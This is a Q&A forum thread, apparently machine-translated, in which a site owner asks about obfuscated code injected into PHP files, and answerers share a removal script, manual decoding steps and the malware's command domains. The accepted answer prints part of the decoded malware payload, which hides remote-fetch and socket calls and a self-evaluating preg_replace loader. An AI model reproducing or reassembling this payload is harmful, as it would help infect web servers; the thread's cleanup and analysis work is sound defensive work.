Hacked Site - Encrypted Code

Question

Hacked Site - Encrypted Code

A few days ago, I noticed that almost all php files on my server are infected with some kind of encrypted code, and almost every file is different. Here is an example from one of the files:

http://pastebin.com/JtkNya5m

Can someone tell me what this code does or how to decode it?

+6

php encryption malware-detection

Darko sedlarevic Dec 18 '13 at 12:54

source share

3 answers

I found the same code in a Wordpress instance and wrote a short script to remove it from all files:

 $directory = new RecursiveDirectoryIterator(dirname(__FILE__)); $iterator = new RecursiveIteratorIterator($directory); foreach ($iterator as $filename => $cur) { $contents = file_get_contents($filename); if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) { echo $filename.PHP_EOL; file_put_contents($filename, substr($contents, 13280)); } }

Just change the line "tngmufxact" to your confusing version and everything will be deleted automatically.

Perhaps the length of the string obfuscation will be different - do not check it in your live environment!

Be sure to back up your files before doing this!

+4

Matthias kleine Jul 10 '15 at 21:28

source share

I decrypted this script, and it (except for obfuscation) is exactly the same as this one: Magento Website Hacked - encryption code in all php files

The URL inside is also the same:

33db9538.com
9507c4e8.com
e5b57288.com
54dfa1cb.com

If you are unsure / inexperienced, do not try to execute or decode the code yourself, but get professional help.

In addition: decoding was performed manually, selecting code fragments and partially executing them (inside the virtual machine - in case something happens wrong).

So basically I repeated this over and over:

select hexadecimal strings to get plain text (to find out which functions will be used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))

The e at the end of the regular expression means evaluation (e.g. php eval function), so be sure to also remove this.

In the end, you have several function definitions, and one of them is called via ob_start .

+2

7ok3n Jun 30 '15 at 19:43

source share

Gavin · Accepted Answer · 2013-12-21T15:54:50+0000

You can calculate the values of some variables and start getting your estimates.

$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33)); preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);

So, the initial goal is to call the wgcdonznijh () function with the payloads in the script, this is done by means of the built-in function call in the pre_replace subject in the expression.

  /* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */

If you hex decode the result, you will be here:

 if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { $GLOBALS["anuna"] = 1; function fjfgg($n) { return chr(ord($n) - 1); } @error_reporting(0); preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...

The above is truncated, but you have another payload as an object of the new preg_replace function. Again, due to e, he can execute.

and it uses the callback for array_map to further decode the payload passed to eval.

Paid download for eval looks like this (hex-decoded):

 $t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5; -4_g@ &oc$5;oc$v5Y5; -3_g@ &oc$5;oc$v5Y5; -2_g@ &oc$5;oc$v5Y5; -1_g@ &oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J( esolcW@5 }5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J( esolcW@5 {6))086,1pi$6,J( tcennocW@ !(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA( etaercW@ &J5;~v5)2pi$6=!61pi$(6fi5;))1pi$( gnol2pi@ ( pi2gnol@ &2pi$5;)X$( emanybXteg@ &1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5; -lru_esrap@6 =p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B( edolpmi@ &%5; -elif@ &cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5; -Z@ &%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus( etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"( edolpxe@ =1a$ ;)po$,)-$( dtg@ (2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28) 45@9 =979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;) W@Y @RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i

What looks truncated ...

This is far, since I have time, but if you want to continue, you can find a useful URL.

http://ddecode.com/

Good luck.

Hacked Site - Encrypted Code

More articles: